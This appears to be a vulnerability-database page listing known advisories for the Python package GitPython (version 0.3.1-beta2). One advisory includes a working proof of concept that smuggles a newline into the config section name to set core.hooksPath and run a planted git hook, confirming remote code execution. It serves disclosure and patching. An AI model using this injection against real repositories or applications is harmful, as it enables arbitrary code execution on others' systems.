Search for packages
| purl | pkg:pypi/gitpython@0.3.1-beta2 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-2z23-b3zg-wuh5
Aliases: CVE-2026-44244 GHSA-v87r-6q3f-2j67 |
Affected by 1 other vulnerability. |
|
|
VCID-4feh-bjbz-uya5
Aliases: GHSA-mv93-w799-cj2w |
GitPython: Newline injection in config_writer() section parameter bypasses CVE-2026-42215 patch, enabling RCE via core.hooksPath Summary The patch for CVE-2026-42215 (GitPython 3.1.49) validates newlines only in the value parameter of set_value(). The section and option parameters are passed to configparser without any newline validation. An attacker who controls the section argument can inject \n to write arbitrary section headers into .git/config, including a forged [core] section with hooksPath pointing to an attacker-controlled directory, leading to RCE when any git hook is triggered. Details File: git/config.py — GitPython 3.1.49 (latest patched version) ```python def set_value(self, section: str, option: str, value) -> "GitConfigParser": value_str = self._value_to_string_safe(value) # only value is validated if not self.has_section(section): self.add_section(section) # section not validated super().set(section, option, value_str) # option not validated return self ``` _write() formats section headers as "[%s]\n" % name. When section = "user]\n[core", this writes [user]\n[core]\n — two valid section headers — into .git/config. PoC ```python import git, os, subprocess repo = git.Repo.init("/tmp/bypass_test") os.makedirs("/tmp/evil_hooks", exist_ok=True) with open("/tmp/evil_hooks/pre-commit", "w") as f: f.write("#!/bin/sh\nid > /tmp/rce_proof.txt\n") os.chmod("/tmp/evil_hooks/pre-commit", 0o755) # Inject newline into section parameter (not value — already patched) with repo.config_writer() as cw: cw.set_value("user]\n[core", "hooksPath", "/tmp/evil_hooks") r = subprocess.run(["git", "-C", "/tmp/bypass_test", "config", "core.hooksPath"], capture_output=True, text=True) print(r.stdout.strip()) # → /tmp/evil_hooks subprocess.run(["git", "-C", "/tmp/bypass_test", "commit", "--allow-empty", "-m", "x"]) print(open("/tmp/rce_proof.txt").read()) # → uid=1000(...) RCE confirmed ``` Impact Same attack outcome as CVE-2026-42215 (RCE via core.hooksPath injection). The patch is incomplete — only value is validated while section and option remain injectable. |
Affected by 0 other vulnerabilities. |
|
VCID-fp8f-ckcg-47a1
Aliases: CVE-2026-44243 GHSA-7545-fcxq-7j24 |
Affected by 2 other vulnerabilities. |
|
|
VCID-prtd-77t4-37er
Aliases: CVE-2023-41040 GHSA-cwvm-v4w8-q58c PYSEC-2023-165 |
Affected by 6 other vulnerabilities. Affected by 6 other vulnerabilities. |
|
|
VCID-r172-bxav-a3ez
Aliases: CVE-2023-40590 GHSA-wfm5-v35h-vwf4 PYSEC-2023-161 |
Affected by 7 other vulnerabilities. |
|
|
VCID-v1x7-st14-rfc1
Aliases: CVE-2023-40267 GHSA-pr76-5cm5-w9cj PYSEC-2023-137 |
Affected by 8 other vulnerabilities. |
|
|
VCID-vuj4-7vfk-9fhy
Aliases: CVE-2024-22190 GHSA-2mqj-m65w-jghx PYSEC-2024-4 |
GitPython is a python library used to interact with Git repositories. There is an incomplete fix for CVE-2023-40590. On Windows, GitPython uses an untrusted search path if it uses a shell to run `git`, as well as when it runs `bash.exe` to interpret hooks. If either of those features are used on Windows, a malicious `git.exe` or `bash.exe` may be run from an untrusted repository. This issue has been patched in version 3.1.41. |
Affected by 5 other vulnerabilities. |
|
VCID-yvgm-nrme-tfgp
Aliases: CVE-2026-42284 GHSA-x2qx-6953-8485 |
Affected by 3 other vulnerabilities. |
|
|
VCID-z2pz-21y4-5khp
Aliases: CVE-2022-24439 GHSA-hcpj-qp55-gfph PYSEC-2022-42992 |
Affected by 9 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||